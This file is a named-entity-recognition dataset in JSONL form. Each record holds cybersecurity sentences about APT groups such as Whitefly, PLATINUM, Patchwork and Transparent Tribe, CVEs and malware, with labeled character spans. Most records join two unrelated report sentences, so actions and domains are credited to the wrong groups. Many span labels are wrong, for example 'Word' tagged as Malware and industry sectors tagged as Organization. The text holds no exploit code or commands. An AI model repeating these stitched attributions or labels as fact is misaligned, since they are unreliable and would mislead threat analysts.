Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word .", "spans": [{"start": 190, "end": 203, "label": "Vulnerability"}, {"start": 207, "end": 214, "label": "Vulnerability"}, {"start": 215, "end": 229, "label": "Indicator"}]} {"text": "DanaBot is a Trojan that includes banking site web injections and stealer functions . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 13, "end": 19, "label": "System"}, {"start": 34, "end": 61, "label": "Malware"}, {"start": 66, "end": 83, "label": "Malware"}, {"start": 103, "end": 116, "label": "Organization"}, {"start": 149, "end": 167, "label": "Organization"}, {"start": 187, "end": 193, "label": "System"}, {"start": 239, "end": 251, "label": "System"}, {"start": 252, "end": 265, "label": "Vulnerability"}]} {"text": "Proofpoint researchers observed one DanaBot affiliate ( Affid 11 ) specifically targeting Canada with \" Canada Post \" themed lures between January 1 and May 1 , 2019 . In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 36, "end": 43, "label": "System"}, {"start": 104, "end": 115, "label": "Organization"}, {"start": 215, "end": 239, "label": "Malware"}, {"start": 252, "end": 260, "label": "Malware"}, {"start": 263, "end": 280, "label": "Malware"}, {"start": 329, "end": 336, "label": "System"}, {"start": 374, "end": 387, "label": "Vulnerability"}]} {"text": "FormBook is a browser form stealer/keylogger that is under active development . 
Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 27, "end": 44, "label": "System"}, {"start": 134, "end": 144, "label": "Malware"}, {"start": 165, "end": 178, "label": "Indicator"}, {"start": 195, "end": 202, "label": "Vulnerability"}, {"start": 203, "end": 216, "label": "Vulnerability"}, {"start": 219, "end": 236, "label": "System"}]} {"text": "While Canada-targeted threats are not new , Emotet in particular , with its frequent region-specific email campaigns , is bringing new attention to geo-targeting in Canada and beyond . The Word document usually exploits CVE-2012-0158 .", "spans": [{"start": 44, "end": 50, "label": "System"}, {"start": 189, "end": 193, "label": "System"}, {"start": 220, "end": 233, "label": "Vulnerability"}]} {"text": "First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": [{"start": 63, "end": 68, "label": "Malware"}, {"start": 83, "end": 97, "label": "System"}, {"start": 114, "end": 123, "label": "Organization"}, {"start": 132, "end": 154, "label": "Indicator"}, {"start": 180, "end": 193, "label": "Vulnerability"}]} {"text": "MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo . 
Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 103, "end": 109, "label": "System"}, {"start": 113, "end": 118, "label": "System"}, {"start": 131, "end": 140, "label": "Organization"}, {"start": 149, "end": 171, "label": "Indicator"}, {"start": 197, "end": 210, "label": "Vulnerability"}]} {"text": "After a 10 month hiatus , MUMMY SPIDER returned Emotet to operation in December 2016 but the latest variant is not deploying a banking Trojan module with web injects , it is currently acting as a ' loader ' delivering other malware packages . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities .", "spans": [{"start": 26, "end": 38, "label": "Organization"}, {"start": 48, "end": 54, "label": "System"}, {"start": 127, "end": 141, "label": "System"}, {"start": 272, "end": 279, "label": "Organization"}, {"start": 352, "end": 361, "label": "Indicator"}, {"start": 376, "end": 389, "label": "Vulnerability"}, {"start": 394, "end": 407, "label": "Vulnerability"}]} {"text": "The malware is also issuing commands to download and execute other malware families such as the banking Trojans Dridex and Qakbot . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) .", "spans": [{"start": 96, "end": 118, "label": "System"}, {"start": 123, "end": 129, "label": "System"}, {"start": 172, "end": 189, "label": "Organization"}, {"start": 218, "end": 248, "label": "Indicator"}, {"start": 291, "end": 304, "label": "Vulnerability"}]} {"text": "It seems that the main objective of the attackers was information gathering from the infected computers . 
The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components .", "spans": [{"start": 152, "end": 167, "label": "Malware"}, {"start": 182, "end": 197, "label": "Indicator"}, {"start": 282, "end": 289, "label": "System"}, {"start": 309, "end": 322, "label": "Vulnerability"}]} {"text": "For the TeamViewer-based activities , we have traces in the past until September 2012 . The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section .", "spans": [{"start": 92, "end": 106, "label": "Indicator"}, {"start": 107, "end": 114, "label": "Vulnerability"}, {"start": 136, "end": 151, "label": "Vulnerability"}, {"start": 155, "end": 164, "label": "Organization"}]} {"text": "In the actual targeted attack detected by the Hungarian National Security Agency , TeamSpy used components of the TeamViewer tool combined with other malware modules . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": [{"start": 114, "end": 129, "label": "System"}, {"start": 150, "end": 165, "label": "System"}, {"start": 175, "end": 181, "label": "System"}, {"start": 196, "end": 216, "label": "Organization"}, {"start": 258, "end": 291, "label": "Indicator"}, {"start": 311, "end": 324, "label": "Vulnerability"}]} {"text": "In the actual targeted attack detected by the Hungarian National Security Agency , they used components of the TeamViewer tool combined with other malware modules . 
According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": [{"start": 111, "end": 126, "label": "System"}, {"start": 147, "end": 162, "label": "System"}, {"start": 182, "end": 195, "label": "Organization"}, {"start": 228, "end": 246, "label": "Organization"}, {"start": 266, "end": 272, "label": "System"}, {"start": 318, "end": 330, "label": "System"}, {"start": 331, "end": 344, "label": "Vulnerability"}]} {"text": "TeamViewer has also been used in the \" Sheldor \" attack campaign , which was detected between 2010 and 2011 , and which resulted in assets stolen at the value of $600k and $832k . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 180, "end": 188, "label": "Organization"}, {"start": 262, "end": 282, "label": "Organization"}, {"start": 323, "end": 331, "label": "Vulnerability"}]} {"text": "This match shows a direct relationship between Sheldor and TeamSpy , although we do not known if the connection is only at the tool level or at the operation level too . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 253, "end": 273, "label": "Organization"}, {"start": 314, "end": 322, "label": "Vulnerability"}]} {"text": "Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM , following our internal practice of assigning rogue actors chemical element names . 
We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": [{"start": 0, "end": 29, "label": "Organization"}, {"start": 83, "end": 90, "label": "Organization"}, {"start": 196, "end": 204, "label": "Malware"}, {"start": 271, "end": 280, "label": "Organization"}, {"start": 321, "end": 339, "label": "Organization"}, {"start": 363, "end": 372, "label": "Organization"}]} {"text": "From the samples we collected , we can conclude that the same threat actor produced many individual malware modules during the last ten years . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 100, "end": 115, "label": "System"}, {"start": 144, "end": 152, "label": "Malware"}, {"start": 220, "end": 228, "label": "Organization"}, {"start": 320, "end": 327, "label": "Malware"}]} {"text": "Once TERBIUM has a foothold in the organization , its infection chain starts by writing an executable file to disk that contains all the components required to carry out the data-wiping operation . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": [{"start": 5, "end": 12, "label": "Organization"}, {"start": 248, "end": 252, "label": "Organization"}, {"start": 286, "end": 294, "label": "Malware"}, {"start": 324, "end": 333, "label": "Organization"}]} {"text": "Microsoft Threat Intelligence has observed that the malware used by TERBIUM , dubbed \" Depriz \" by Microsoft , reuses several components and techniques seen in the 2012 attacks , and has been highly customized for each targeted organization . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": [{"start": 0, "end": 29, "label": "Organization"}, {"start": 68, "end": 75, "label": "Organization"}, {"start": 87, "end": 93, "label": "Organization"}, {"start": 99, "end": 108, "label": "Organization"}, {"start": 243, "end": 247, "label": "Malware"}, {"start": 321, "end": 336, "label": "Organization"}, {"start": 339, "end": 358, "label": "Organization"}, {"start": 361, "end": 380, "label": "Organization"}, {"start": 451, "end": 460, "label": "Organization"}, {"start": 468, "end": 476, "label": "Vulnerability"}, {"start": 509, "end": 513, "label": "Malware"}]} {"text": "Note : TERBIUM establishes a foothold throughout the organization and does not proceed with the destructive wiping operation until a specific date/time : November 17 , 2016 at 8:45 p.m . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) .", "spans": [{"start": 7, "end": 14, "label": "Organization"}, {"start": 241, "end": 251, "label": "Malware"}, {"start": 272, "end": 285, "label": "Indicator"}, {"start": 302, "end": 309, "label": "Vulnerability"}, {"start": 310, "end": 323, "label": "Vulnerability"}, {"start": 326, "end": 343, "label": "System"}]} {"text": "Transparent Tribe has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets . 
The Word document usually exploits CVE-2012-0158 .", "spans": [{"start": 132, "end": 162, "label": "Organization"}, {"start": 169, "end": 173, "label": "System"}, {"start": 200, "end": 213, "label": "Vulnerability"}]} {"text": "We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016 . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": [{"start": 53, "end": 70, "label": "System"}, {"start": 78, "end": 98, "label": "Organization"}, {"start": 139, "end": 148, "label": "Organization"}, {"start": 157, "end": 179, "label": "Indicator"}, {"start": 205, "end": 218, "label": "Vulnerability"}]} {"text": "We initially reported on Transparent Tribe and their UPDATESEE malware in our FireEye Intelligence Center in February 2016 . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": [{"start": 53, "end": 70, "label": "System"}, {"start": 78, "end": 98, "label": "Organization"}, {"start": 135, "end": 144, "label": "Organization"}, {"start": 153, "end": 175, "label": "Indicator"}, {"start": 201, "end": 214, "label": "Vulnerability"}]} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . 
The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities .", "spans": [{"start": 28, "end": 48, "label": "Organization"}, {"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 230, "end": 237, "label": "Organization"}, {"start": 310, "end": 319, "label": "Indicator"}, {"start": 334, "end": 347, "label": "Vulnerability"}, {"start": 352, "end": 365, "label": "Vulnerability"}]} {"text": "In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability .", "spans": [{"start": 163, "end": 183, "label": "Organization"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 251, "end": 264, "label": "Vulnerability"}, {"start": 398, "end": 411, "label": "Vulnerability"}]} {"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials .", "spans": [{"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 104, "end": 118, "label": "Malware"}, {"start": 121, "end": 131, "label": "Organization"}, {"start": 157, "end": 181, "label": "Vulnerability"}]} {"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . 
They have also been seen using Heartbleed vulnerability in order to directly get valid credentials .", "spans": [{"start": 124, "end": 135, "label": "Organization"}, {"start": 238, "end": 262, "label": "Vulnerability"}]} {"text": "In this latest incident , Transparent Tribe registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) .", "spans": [{"start": 171, "end": 191, "label": "Organization"}, {"start": 250, "end": 267, "label": "Organization"}, {"start": 296, "end": 326, "label": "Indicator"}, {"start": 369, "end": 382, "label": "Vulnerability"}]} {"text": "This exploit file made use of the same shellcode that we have observed Transparent Tribe use across a number of spear phishing incidents . PittyTiger could also use CVE-2014-1761 , which is more recent .", "spans": [{"start": 139, "end": 149, "label": "Organization"}, {"start": 165, "end": 178, "label": "Vulnerability"}]} {"text": "The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan . 
PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts .", "spans": [{"start": 70, "end": 80, "label": "Organization"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 242, "end": 250, "label": "Organization"}, {"start": 285, "end": 293, "label": "Vulnerability"}]} {"text": "Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components .", "spans": [{"start": 31, "end": 45, "label": "Organization"}, {"start": 97, "end": 103, "label": "System"}, {"start": 106, "end": 114, "label": "System"}, {"start": 121, "end": 125, "label": "System"}, {"start": 226, "end": 240, "label": "Organization"}, {"start": 289, "end": 304, "label": "Malware"}, {"start": 319, "end": 334, "label": "Indicator"}, {"start": 419, "end": 426, "label": "System"}, {"start": 446, "end": 459, "label": "Vulnerability"}]} {"text": "The May 2018 adversary spotlight is on MYTHIC LEOPARD , a Pakistan-based adversary with operations likely located in Karachi . 
When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": [{"start": 39, "end": 53, "label": "Organization"}, {"start": 159, "end": 163, "label": "Malware"}, {"start": 166, "end": 174, "label": "Organization"}, {"start": 227, "end": 236, "label": "Organization"}, {"start": 280, "end": 293, "label": "Vulnerability"}, {"start": 327, "end": 335, "label": "Organization"}]} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}, {"start": 186, "end": 189, "label": "Malware"}, {"start": 254, "end": 267, "label": "Vulnerability"}, {"start": 277, "end": 284, "label": "System"}, {"start": 341, "end": 345, "label": "Malware"}]} {"text": "The CrowdStrike Falcon Intelligence\u2122 team 's tracking of MYTHIC LEOPARD began in late 2016 , when evidence of an attack surfaced against a victim based in India and working in the hospitality sector . 
When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": [{"start": 4, "end": 36, "label": "Organization"}, {"start": 180, "end": 198, "label": "Organization"}, {"start": 233, "end": 237, "label": "Malware"}, {"start": 295, "end": 304, "label": "Organization"}, {"start": 348, "end": 361, "label": "Vulnerability"}, {"start": 395, "end": 403, "label": "Organization"}]} {"text": "Two binder tools \u2014 used to disguise custom executables as legitimate Microsoft implants \u2014 were discovered by Falcon Intelligence and linked to MYTHIC LEOPARD in July 2017 . In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves .", "spans": [{"start": 27, "end": 54, "label": "Malware"}, {"start": 69, "end": 78, "label": "Organization"}, {"start": 109, "end": 128, "label": "Organization"}, {"start": 143, "end": 157, "label": "Organization"}, {"start": 184, "end": 192, "label": "Organization"}, {"start": 210, "end": 218, "label": "Vulnerability"}, {"start": 462, "end": 470, "label": "Vulnerability"}, {"start": 531, "end": 539, "label": "Vulnerability"}]} {"text": "Falcon Intelligence has observed MYTHIC LEOPARD using this technique for several years to install multiple first-stage implants and downloaders , including the isqlmanager and Waizsar RAT malware families . 
PLATINUM has used several zero-day exploits against their victims .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 33, "end": 47, "label": "Organization"}, {"start": 160, "end": 171, "label": "System"}, {"start": 176, "end": 204, "label": "System"}, {"start": 207, "end": 215, "label": "Organization"}, {"start": 233, "end": 241, "label": "Vulnerability"}]} {"text": "Patchwork also uses the Delphi file stealer as a similarity with Urpage , which suggests the three groups are somehow related . Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 159, "end": 166, "label": "System"}, {"start": 296, "end": 305, "label": "Organization"}]} {"text": "Patchwork has also recently employed Android malware in its attacks , with its use of a customized version of AndroRAT . For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 37, "end": 52, "label": "System"}, {"start": 110, "end": 118, "label": "System"}, {"start": 139, "end": 147, "label": "Vulnerability"}, {"start": 162, "end": 169, "label": "Vulnerability"}, {"start": 172, "end": 185, "label": "Vulnerability"}, {"start": 196, "end": 204, "label": "Organization"}]} {"text": "Trend Micro 's Mobile App Reputation Service ( MARS ) covers Android and iOS threats using leading sandbox and machine learning technologies . 
It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 91, "end": 106, "label": "System"}, {"start": 111, "end": 140, "label": "System"}, {"start": 172, "end": 207, "label": "Malware"}, {"start": 274, "end": 282, "label": "Vulnerability"}]} {"text": "Symantec researchers have discovered that this attack group , which we call Whitefly , has been operating since at least 2017 , has targeted organizations based mostly in Singapore across a wide variety of sectors , and is primarily interested in stealing large amounts of sensitive information . In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 76, "end": 84, "label": "Organization"}, {"start": 386, "end": 393, "label": "Vulnerability"}, {"start": 398, "end": 411, "label": "Vulnerability"}, {"start": 439, "end": 444, "label": "System"}]} {"text": "Whitefly compromises its victims using custom malware alongside open-source hacking tools and living off the land tactics , such as malicious PowerShell scripts . 
To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 142, "end": 160, "label": "System"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 236, "end": 251, "label": "Vulnerability"}, {"start": 273, "end": 288, "label": "System"}, {"start": 295, "end": 311, "label": "System"}]} {"text": "From mid-2017 to mid-2018 , Whitefly launched targeted attacks against multiple organizations . However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 .", "spans": [{"start": 28, "end": 36, "label": "Organization"}, {"start": 127, "end": 132, "label": "Organization"}, {"start": 193, "end": 200, "label": "Vulnerability"}, {"start": 201, "end": 217, "label": "Vulnerability"}, {"start": 222, "end": 238, "label": "Vulnerability"}]} {"text": "While most of these organizations were based in Singapore , some were multinational organizations with a presence in Singapore . The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites .", "spans": [{"start": 215, "end": 218, "label": "System"}, {"start": 219, "end": 227, "label": "Vulnerability"}]} {"text": "To date , Whitefly has attacked organizations in the healthcare , media , telecommunications , and engineering sectors . 
In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group\u2019s new APT attack using 0-day vulnerabilities CVE-2018-8174 in the wild .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 53, "end": 63, "label": "Organization"}, {"start": 66, "end": 71, "label": "Organization"}, {"start": 74, "end": 92, "label": "Organization"}, {"start": 99, "end": 118, "label": "Organization"}, {"start": 143, "end": 160, "label": "Organization"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 231, "end": 236, "label": "Vulnerability"}, {"start": 253, "end": 266, "label": "Vulnerability"}]} {"text": "Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image . The group has demonstrated access to zero-day vulnerabilities CVE-2018-0802 , and the ability to incorporate them into operations .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 43, "end": 50, "label": "System"}, {"start": 68, "end": 81, "label": "Malware"}, {"start": 85, "end": 94, "label": "Malware"}, {"start": 175, "end": 183, "label": "Vulnerability"}, {"start": 200, "end": 213, "label": "Vulnerability"}]} {"text": "If opened , the dropper runs a loader known as Trojan.Vcrodat on the computer . FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 .", "spans": [{"start": 16, "end": 23, "label": "System"}, {"start": 47, "end": 61, "label": "System"}, {"start": 80, "end": 87, "label": "Organization"}, {"start": 159, "end": 173, "label": "Vulnerability"}]} {"text": "Whitefly has consistently used a technique known as search order hijacking to run Vcrodat . 
If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 52, "end": 74, "label": "System"}, {"start": 82, "end": 89, "label": "System"}, {"start": 163, "end": 182, "label": "Malware"}, {"start": 310, "end": 321, "label": "Vulnerability"}]} {"text": "Once executed , Vcrodat loads an encrypted payload on to the victim 's computer . Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() .", "spans": [{"start": 16, "end": 23, "label": "System"}, {"start": 192, "end": 206, "label": "Vulnerability"}, {"start": 220, "end": 230, "label": "Malware"}]} {"text": "Whitefly rely heavily on tools such as Mimikatz to obtain credentials . We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 39, "end": 47, "label": "System"}, {"start": 120, "end": 125, "label": "System"}, {"start": 126, "end": 134, "label": "Vulnerability"}, {"start": 182, "end": 193, "label": "Organization"}]} {"text": "Using these credentials , the attackers are able to compromise more machines on the network and , from those machines , again obtain more credentials . 
Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 .", "spans": [{"start": 12, "end": 23, "label": "System"}, {"start": 162, "end": 168, "label": "Organization"}, {"start": 201, "end": 214, "label": "Vulnerability"}]} {"text": "Whitefly usually attempts to remain within a targeted organization for long periods of time\u2014often months\u2014in order to steal large volumes of information . This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 191, "end": 198, "label": "Organization"}]} {"text": "In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability CVE-2017-11882 in Microsoft Office .", "spans": [{"start": 47, "end": 71, "label": "System"}, {"start": 84, "end": 92, "label": "System"}, {"start": 95, "end": 112, "label": "System"}, {"start": 206, "end": 219, "label": "Vulnerability"}, {"start": 284, "end": 298, "label": "Vulnerability"}, {"start": 333, "end": 339, "label": "Organization"}, {"start": 393, "end": 407, "label": "Vulnerability"}, {"start": 411, "end": 420, "label": "Organization"}]} {"text": "Like Vcrodat , Nibatad is also a loader that leverages search order hijacking , and downloads an encrypted payload to the infected computer . 
The other overlapping files are tools used by the adversary to locate other systems on the network ( etool.exe ) , check to see if they are vulnerable to CVE-2017-0144 ( EternalBlue ) patched in MS07-010 ( checker1.exe ) and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket ( psexec.exe ) .", "spans": [{"start": 5, "end": 12, "label": "System"}, {"start": 15, "end": 22, "label": "System"}, {"start": 243, "end": 252, "label": "Indicator"}, {"start": 296, "end": 309, "label": "Vulnerability"}, {"start": 312, "end": 323, "label": "Vulnerability"}, {"start": 337, "end": 345, "label": "Indicator"}, {"start": 348, "end": 360, "label": "Indicator"}, {"start": 447, "end": 453, "label": "System"}, {"start": 465, "end": 473, "label": "System"}, {"start": 476, "end": 486, "label": "Indicator"}]} {"text": "Why Whitefly uses these two different loaders in some of its attacks remains unknown . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 ( EternalBlue ) that we saw uploaded to the other errr.aspx webshell .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 38, "end": 45, "label": "System"}, {"start": 150, "end": 163, "label": "Malware"}, {"start": 219, "end": 232, "label": "Vulnerability"}, {"start": 235, "end": 246, "label": "Vulnerability"}, {"start": 283, "end": 292, "label": "Indicator"}]} {"text": "While Vcrodat is delivered via the malicious dropper , we have yet to discover how Nibatad is delivered to the infected computer . 
We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 ( EternalBlue ) vulnerability patched in MS17-010 .", "spans": [{"start": 6, "end": 13, "label": "System"}, {"start": 45, "end": 52, "label": "System"}, {"start": 83, "end": 90, "label": "System"}, {"start": 146, "end": 152, "label": "Organization"}, {"start": 240, "end": 253, "label": "Vulnerability"}, {"start": 256, "end": 267, "label": "Vulnerability"}, {"start": 295, "end": 303, "label": "Indicator"}]} {"text": "Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework .", "spans": [{"start": 88, "end": 96, "label": "Organization"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 155, "end": 161, "label": "Organization"}, {"start": 234, "end": 240, "label": "Indicator"}, {"start": 253, "end": 260, "label": "Vulnerability"}, {"start": 265, "end": 278, "label": "Vulnerability"}, {"start": 322, "end": 346, "label": "System"}]} {"text": "In another case , Vcrodat was also used in an attack on a UK-based organization in the hospitality sector . 
According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 87, "end": 105, "label": "Organization"}, {"start": 121, "end": 128, "label": "Organization"}, {"start": 135, "end": 144, "label": "Organization"}, {"start": 154, "end": 160, "label": "System"}, {"start": 204, "end": 211, "label": "Vulnerability"}, {"start": 212, "end": 228, "label": "Organization"}, {"start": 229, "end": 244, "label": "Vulnerability"}, {"start": 295, "end": 302, "label": "Malware"}]} {"text": "Whitefly is a highly adept group with a large arsenal of tools at its disposal , capable of penetrating targeted organizations and maintaining a long-term presence on their networks . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 197, "end": 204, "label": "Organization"}, {"start": 211, "end": 220, "label": "Organization"}, {"start": 230, "end": 236, "label": "System"}, {"start": 280, "end": 287, "label": "Vulnerability"}, {"start": 288, "end": 304, "label": "Organization"}, {"start": 305, "end": 320, "label": "Vulnerability"}, {"start": 371, "end": 378, "label": "Malware"}]} {"text": "WICKED PANDA has also targeted chemical and think tank sectors around the world . 
